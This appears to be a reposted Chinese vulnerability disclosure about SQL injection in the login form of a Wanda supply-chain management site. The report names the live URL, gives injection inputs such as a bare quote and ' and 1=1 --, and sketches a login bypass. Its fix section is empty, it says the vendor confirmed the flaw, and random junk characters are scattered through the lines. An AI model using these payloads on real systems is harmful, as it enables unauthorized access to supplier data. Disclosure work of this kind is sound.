简要描述:万达某分站sql注入。敏感信息泄露。3 h9 j1 ]: b+ \; T2 S
详细说明:8 n) C! C* @. K; g0 T
万达scm系统登陆框sql注入。: X9 O4 _8 k' J0 o, D
3 U; N% L9 Z% C* d9 f C f$ v* @2 f
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27. |) ?7 S& x$ Q" g0 D; g
1 y$ [" q3 Q/ b0 ~
9 k$ A( m) I# u
500错误。
& i/ a) p- y- ]+ D3 B
[3 ~( r/ H' M7 P+ A2 b: o+ C; }用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。# H1 |$ j( Q0 }, o% k! H4 `' D
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
7 M! ? T" n) I9 j R3 i) a: M截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
3 S! Z+ K: @( D) X1 H8 R/ v经过分析,登陆验证的过程应该是:" g9 x/ } t5 }: N
9 g8 T/ A! V1 G, _7 @" ]
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
! h# L3 Y6 C7 W. whttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
/ G& ^; W& K0 w: X+ X( Q3 `/ s$ Q! j- c3 \
oracle数据库,存在注入点。@大连万达,你怎么看?
3 M3 r8 ?+ M. U: Vhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
' G5 L0 Y1 C% @: t; s+ v! @/ D$ \4 C+ i0 H6 P# t2 Z+ l
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
0 G, }) X2 Q9 w漏洞证明:
3 m% r7 c f- @% e2 S% [+ l! Q6 y! c万达scm系统登陆框sql注入。
0 d# Y9 I: H- S2 j0 I* Y, v8 R' ]0 q# u
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27# K( l, {7 A4 i9 V5 @; w5 j& G
* u" R9 z( j( H( M
9 r* [$ Z% Z+ n& S! F! c
500错误。$ y6 U+ _- x# j) q" Z: F; @
- Q+ N' z9 h! T- P6 ^, h- p! z" q
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
) H8 h+ g7 c/ s" m# v0 q( y5 xhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png( f* ^2 d1 h4 O$ Q: f
( _* E7 g' I; p( h) n+ Q! c9 V3 ^5 [
(截图有一点问题)
8 n# [2 o' p) Q, S$ m8 S" ?6 q S: `0 e7 v
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
$ w# E+ e4 l# W# x5 F w2 z2 _8 T- T6 M: j
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。, D# h' N) K: e: P
% W# C3 l. }! ?+ P) _5 ]绕过:
& H8 W6 x0 Y* Y/ @; y2 zhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=11 b/ Q) \8 D0 l/ z
- n. Y) J( B$ r3 z
/ v% e) l7 l( w, O! {2 p% Horacle数据库,存在注入点。@大连万达,你怎么看?
' N$ Y6 \6 T+ X; N% }系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。, }6 L. r, Q+ K, g
/ X2 N6 U* `& z2 }- a+ s+ M
修复方案:: S |0 ?$ ^4 {
。。。
d- D3 ?6 F3 \0 {2 ^1 b$ U; T
1 ?& }4 V! S' L/ l
* g9 P) W/ u; _厂商已经确认
5 b: G( h; f3 u0 I- u# A# J/ t
$ D8 a/ x: I% }0 w% t[/td][/tr]. D" K! Y+ A& C/ a6 z. L _
[/table]
" J6 e8 ]% C/ B; R. M; ~1 a5 S# K
+ N$ Y: h |7 {1 P2 v1 L( |6 W' j
|